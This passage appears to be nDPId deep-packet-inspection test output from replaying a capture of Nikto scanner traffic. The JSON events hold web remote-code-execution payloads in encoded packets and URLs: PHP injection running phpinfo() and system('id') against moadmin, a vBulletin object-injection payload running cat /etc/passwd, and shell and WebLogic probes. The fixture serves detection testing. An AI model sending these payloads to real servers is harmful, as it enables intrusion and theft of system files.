-00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01391{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01398{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} 
-01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 